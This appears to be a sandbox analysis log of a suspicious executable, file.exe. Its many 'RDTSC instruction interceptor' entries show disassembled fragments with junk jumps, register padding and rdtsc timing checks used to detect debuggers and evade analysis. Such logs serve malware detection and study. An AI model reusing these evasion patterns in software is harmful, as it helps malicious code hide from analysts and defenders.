                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10104 second address: 4A10152 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C54B5854Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub esp, 18h 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F6C54B58554h 0x00000013 sbb al, FFFFFFF8h 0x00000016 jmp 00007F6C54B5854Bh 0x0000001b popfd 0x0000001c mov edx, esi 0x0000001e popad 0x0000001f xchg eax, ebx 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F6C54B58551h 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10152 second address: 4A10180 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F6C544CAC2Ah 0x00000008 pop esi 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jmp 00007F6C544CAC30h 0x00000012 xchg eax, ebx 0x00000013 pushad 0x00000014 mov bx, si 0x00000017 pushad 0x00000018 mov cx, 4EEFh 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10180 second address: 4A101EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov ebx, dword ptr [eax+10h] 0x00000009 pushad 0x0000000a jmp 00007F6C54B5854Eh 0x0000000f mov ah, 07h 0x00000011 popad 0x00000012 push ebx 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007F6C54B58558h 0x0000001a xor cl, 00000078h 0x0000001d jmp 00007F6C54B5854Bh 0x00000022 popfd 0x00000023 call 00007F6C54B58558h 0x00000028 pushad 0x00000029 popad 0x0000002a pop ecx 0x0000002b popad 0x0000002c mov dword ptr [esp], esi 0x0000002f pushad 0x00000030 push eax 0x00000031 push edx 0x00000032 mov edx, 589937EEh 0x00000037 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A101EC second address: 4A10237 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dx, 6508h 0x0000000a popad 0x0000000b mov esi, dword ptr [756006ECh] 0x00000011 jmp 00007F6C544CAC37h 0x00000016 test esi, esi 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b mov edi, 65BEB026h 0x00000020 call 00007F6C544CAC37h 0x00000025 pop esi 0x00000026 popad 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10237 second address: 4A1028E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C54B58556h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007F6C54B594B6h 0x0000000f jmp 00007F6C54B58550h 0x00000014 xchg eax, edi 0x00000015 jmp 00007F6C54B58550h 0x0000001a push eax 0x0000001b jmp 00007F6C54B5854Bh 0x00000020 xchg eax, edi 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 mov cl, bh 0x00000026 movzx esi, di 0x00000029 popad 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A1028E second address: 4A102A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6C544CAC35h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A102A7 second address: 4A1037F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 call dword ptr [755D0B60h] 0x0000000e mov eax, 7696E5E0h 0x00000013 ret 0x00000014 jmp 00007F6C54B5854Dh 0x00000019 push 00000044h 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007F6C54B5854Ch 0x00000022 and eax, 588A8348h 0x00000028 jmp 00007F6C54B5854Bh 0x0000002d popfd 0x0000002e call 00007F6C54B58558h 0x00000033 push ecx 0x00000034 pop edx 0x00000035 pop ecx 0x00000036 popad 0x00000037 pop edi 0x00000038 pushad 0x00000039 pushfd 0x0000003a jmp 00007F6C54B58553h 0x0000003f xor ecx, 4426E2EEh 0x00000045 jmp 00007F6C54B58559h 0x0000004a popfd 0x0000004b pushfd 0x0000004c jmp 00007F6C54B58550h 0x00000051 jmp 00007F6C54B58555h 0x00000056 popfd 0x00000057 popad 0x00000058 xchg eax, edi 0x00000059 jmp 00007F6C54B5854Eh 0x0000005e push eax 0x0000005f push eax 0x00000060 push edx 0x00000061 push eax 0x00000062 push edx 0x00000063 jmp 00007F6C54B5854Dh 0x00000068 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A1037F second address: 4A10394 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C544CAC31h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10394 second address: 4A103A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6C54B5854Ch 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A103A4 second address: 4A103CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C544CAC2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, edi 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007F6C544CAC31h 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A103CD second address: 4A103D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A103D3 second address: 4A103D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A103D7 second address: 4A10484 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push dword ptr [eax] 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F6C54B58555h 0x00000011 sbb ah, 00000056h 0x00000014 jmp 00007F6C54B58551h 0x00000019 popfd 0x0000001a pushfd 0x0000001b jmp 00007F6C54B58550h 0x00000020 sub cx, 6178h 0x00000025 jmp 00007F6C54B5854Bh 0x0000002a popfd 0x0000002b popad 0x0000002c mov eax, dword ptr fs:[00000030h] 0x00000032 pushad 0x00000033 pushfd 0x00000034 jmp 00007F6C54B58554h 0x00000039 sbb si, FBD8h 0x0000003e jmp 00007F6C54B5854Bh 0x00000043 popfd 0x00000044 pushad 0x00000045 jmp 00007F6C54B58556h 0x0000004a pushad 0x0000004b popad 0x0000004c popad 0x0000004d popad 0x0000004e push dword ptr [eax+18h] 0x00000051 push eax 0x00000052 push edx 0x00000053 pushad 0x00000054 movsx edi, si 0x00000057 mov dh, ch 0x00000059 popad 0x0000005a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A104CA second address: 4A1052D instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F6C544CAC2Eh 0x00000008 and ch, 00000058h 0x0000000b jmp 00007F6C544CAC2Bh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 popad 0x00000014 je 00007F6CC5039DE1h 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007F6C544CAC34h 0x00000021 sub eax, 34D54FB8h 0x00000027 jmp 00007F6C544CAC2Bh 0x0000002c popfd 0x0000002d movzx ecx, dx 0x00000030 popad 0x00000031 mov eax, 00000000h 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 movsx edi, si 0x0000003c push esi 0x0000003d pop edx 0x0000003e popad 0x0000003f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A1052D second address: 4A1057B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C54B5854Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi], edi 0x0000000b pushad 0x0000000c mov ebx, eax 0x0000000e pushfd 0x0000000f jmp 00007F6C54B58550h 0x00000014 sbb cx, 7478h 0x00000019 jmp 00007F6C54B5854Bh 0x0000001e popfd 0x0000001f popad 0x00000020 mov dword ptr [esi+04h], eax 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007F6C54B58550h 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A1057B second address: 4A10581 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10581 second address: 4A10587 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10587 second address: 4A10611 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+08h], eax 0x0000000b pushad 0x0000000c call 00007F6C544CAC32h 0x00000011 call 00007F6C544CAC32h 0x00000016 pop eax 0x00000017 pop edi 0x00000018 pushfd 0x00000019 jmp 00007F6C544CAC30h 0x0000001e sub cx, D398h 0x00000023 jmp 00007F6C544CAC2Bh 0x00000028 popfd 0x00000029 popad 0x0000002a mov dword ptr [esi+0Ch], eax 0x0000002d jmp 00007F6C544CAC36h 0x00000032 mov eax, dword ptr [ebx+4Ch] 0x00000035 push eax 0x00000036 push edx 0x00000037 jmp 00007F6C544CAC37h 0x0000003c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10611 second address: 4A10684 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C54B58559h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+10h], eax 0x0000000c pushad 0x0000000d call 00007F6C54B5854Ch 0x00000012 mov dx, si 0x00000015 pop eax 0x00000016 pushfd 0x00000017 jmp 00007F6C54B58557h 0x0000001c sub ecx, 16C5D47Eh 0x00000022 jmp 00007F6C54B58559h 0x00000027 popfd 0x00000028 popad 0x00000029 mov eax, dword ptr [ebx+50h] 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10684 second address: 4A10688 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10688 second address: 4A1069B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C54B5854Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A1069B second address: 4A1070B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C544CAC39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+14h], eax 0x0000000c jmp 00007F6C544CAC2Eh 0x00000011 mov eax, dword ptr [ebx+54h] 0x00000014 jmp 00007F6C544CAC30h 0x00000019 mov dword ptr [esi+18h], eax 0x0000001c jmp 00007F6C544CAC30h 0x00000021 mov eax, dword ptr [ebx+58h] 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F6C544CAC37h 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A1070B second address: 4A10731 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C54B58559h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+1Ch], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10731 second address: 4A10735 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10735 second address: 4A1073B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A1073B second address: 4A10741 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10741 second address: 4A10745 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10745 second address: 4A10749 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10749 second address: 4A1075E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+5Ch] 0x0000000b pushad 0x0000000c mov bx, ax 0x0000000f push eax 0x00000010 push edx 0x00000011 mov ax, AD17h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A1075E second address: 4A10798 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F6C544CAC2Ch 0x00000008 jmp 00007F6C544CAC35h 0x0000000d popfd 0x0000000e pop edx 0x0000000f pop eax 0x00000010 popad 0x00000011 mov dword ptr [esi+20h], eax 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F6C544CAC2Dh 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10798 second address: 4A1079D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A1079D second address: 4A107C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007F6C544CAC2Dh 0x00000009 pop esi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [ebx+60h] 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F6C544CAC2Ah 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A107C1 second address: 4A107C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A107C7 second address: 4A107CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A107CB second address: 4A10876 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+24h], eax 0x0000000b pushad 0x0000000c mov si, bx 0x0000000f pushad 0x00000010 movsx edi, ax 0x00000013 mov edi, eax 0x00000015 popad 0x00000016 popad 0x00000017 mov eax, dword ptr [ebx+64h] 0x0000001a jmp 00007F6C54B58554h 0x0000001f mov dword ptr [esi+28h], eax 0x00000022 pushad 0x00000023 pushad 0x00000024 pushfd 0x00000025 jmp 00007F6C54B5854Ch 0x0000002a sbb cx, 0408h 0x0000002f jmp 00007F6C54B5854Bh 0x00000034 popfd 0x00000035 pushad 0x00000036 popad 0x00000037 popad 0x00000038 jmp 00007F6C54B58556h 0x0000003d popad 0x0000003e mov eax, dword ptr [ebx+68h] 0x00000041 jmp 00007F6C54B58550h 0x00000046 mov dword ptr [esi+2Ch], eax 0x00000049 jmp 00007F6C54B58550h 0x0000004e mov ax, word ptr [ebx+6Ch] 0x00000052 pushad 0x00000053 mov eax, 51BC1E9Dh 0x00000058 mov eax, 44C10799h 0x0000005d popad 0x0000005e mov word ptr [esi+30h], ax 0x00000062 push eax 0x00000063 push edx 0x00000064 push eax 0x00000065 push edx 0x00000066 push eax 0x00000067 push edx 0x00000068 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10876 second address: 4A1087A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A1087A second address: 4A1088B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C54B5854Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A1088B second address: 4A108C3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C544CAC31h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ax, word ptr [ebx+00000088h] 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 movsx ebx, cx 0x00000016 call 00007F6C544CAC34h 0x0000001b pop esi 0x0000001c popad 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A108C3 second address: 4A108DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6C54B58557h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A108DE second address: 4A1090D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C544CAC39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov word ptr [esi+32h], ax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 movsx ebx, ax 0x00000015 mov ecx, 7EBA3EDBh 0x0000001a popad 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A1090D second address: 4A109C4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 37089E42h 0x00000008 pushfd 0x00000009 jmp 00007F6C54B58553h 0x0000000e or si, 053Eh 0x00000013 jmp 00007F6C54B58559h 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c mov eax, dword ptr [ebx+0000008Ch] 0x00000022 pushad 0x00000023 pushfd 0x00000024 jmp 00007F6C54B58553h 0x00000029 jmp 00007F6C54B58553h 0x0000002e popfd 0x0000002f popad 0x00000030 mov dword ptr [esi+34h], eax 0x00000033 pushad 0x00000034 pushfd 0x00000035 jmp 00007F6C54B58554h 0x0000003a and esi, 3A9E4BC8h 0x00000040 jmp 00007F6C54B5854Bh 0x00000045 popfd 0x00000046 mov bl, ah 0x00000048 popad 0x00000049 mov eax, dword ptr [ebx+18h] 0x0000004c pushad 0x0000004d jmp 00007F6C54B58551h 0x00000052 push eax 0x00000053 push edx 0x00000054 mov cx, 767Dh 0x00000058 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A109C4 second address: 4A109C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A109C8 second address: 4A109D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esi+38h], eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A109D7 second address: 4A109DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A109DD second address: 4A109E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A109E2 second address: 4A10A38 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F6C544CAC2Ah 0x00000009 and ecx, 70E90088h 0x0000000f jmp 00007F6C544CAC2Bh 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007F6C544CAC38h 0x0000001b xor cx, 62E8h 0x00000020 jmp 00007F6C544CAC2Bh 0x00000025 popfd 0x00000026 popad 0x00000027 pop edx 0x00000028 pop eax 0x00000029 mov eax, dword ptr [ebx+1Ch] 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10A38 second address: 4A10A3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10A3C second address: 4A10A42 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10A42 second address: 4A10A72 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C54B5854Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+3Ch], eax 0x0000000c jmp 00007F6C54B58550h 0x00000011 mov eax, dword ptr [ebx+20h] 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 mov bx, 2690h 0x0000001b mov dx, 1BBCh 0x0000001f popad 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10A72 second address: 4A10AFE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C544CAC32h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+40h], eax 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F6C544CAC2Eh 0x00000013 and al, 00000008h 0x00000016 jmp 00007F6C544CAC2Bh 0x0000001b popfd 0x0000001c pushfd 0x0000001d jmp 00007F6C544CAC38h 0x00000022 sub si, CC68h 0x00000027 jmp 00007F6C544CAC2Bh 0x0000002c popfd 0x0000002d popad 0x0000002e lea eax, dword ptr [ebx+00000080h] 0x00000034 pushad 0x00000035 mov edx, eax 0x00000037 mov esi, 12B51E57h 0x0000003c popad 0x0000003d push 00000001h 0x0000003f push eax 0x00000040 push edx 0x00000041 push eax 0x00000042 push edx 0x00000043 jmp 00007F6C544CAC34h 0x00000048 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10AFE second address: 4A10B0D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C54B5854Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10B0D second address: 4A10B48 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C544CAC39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jmp 00007F6C544CAC2Eh 0x0000000f push eax 0x00000010 pushad 0x00000011 mov si, di 0x00000014 mov dl, 0Bh 0x00000016 popad 0x00000017 nop 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10B48 second address: 4A10B4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10B4C second address: 4A10B52 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10B52 second address: 4A10B65 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6C54B5854Fh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10B65 second address: 4A10B9C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C544CAC39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b lea eax, dword ptr [ebp-10h] 0x0000000e jmp 00007F6C544CAC2Eh 0x00000013 nop 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10B9C second address: 4A10BA0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10BA0 second address: 4A10BA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10BA6 second address: 4A10BAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10BAC second address: 4A10BB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10BB0 second address: 4A10BB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10C0D second address: 4A10C62 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C544CAC31h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007F6CC50396C7h 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F6C544CAC2Ch 0x00000016 sbb ax, 5CF8h 0x0000001b jmp 00007F6C544CAC2Bh 0x00000020 popfd 0x00000021 mov si, 222Fh 0x00000025 popad 0x00000026 mov eax, dword ptr [ebp-0Ch] 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007F6C544CAC31h 0x00000030 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10C62 second address: 4A10C68 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10C68 second address: 4A10C6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10C6C second address: 4A10C70 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10C70 second address: 4A10CD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+04h], eax 0x0000000b jmp 00007F6C544CAC2Fh 0x00000010 lea eax, dword ptr [ebx+78h] 0x00000013 pushad 0x00000014 push eax 0x00000015 push ebx 0x00000016 pop eax 0x00000017 pop ebx 0x00000018 pushad 0x00000019 call 00007F6C544CAC2Ah 0x0000001e pop ecx 0x0000001f mov ebx, 2F564DA6h 0x00000024 popad 0x00000025 popad 0x00000026 push 00000001h 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b pushfd 0x0000002c jmp 00007F6C544CAC36h 0x00000031 sub ax, 1B48h 0x00000036 jmp 00007F6C544CAC2Bh 0x0000003b popfd 0x0000003c popad 0x0000003d rdtsc
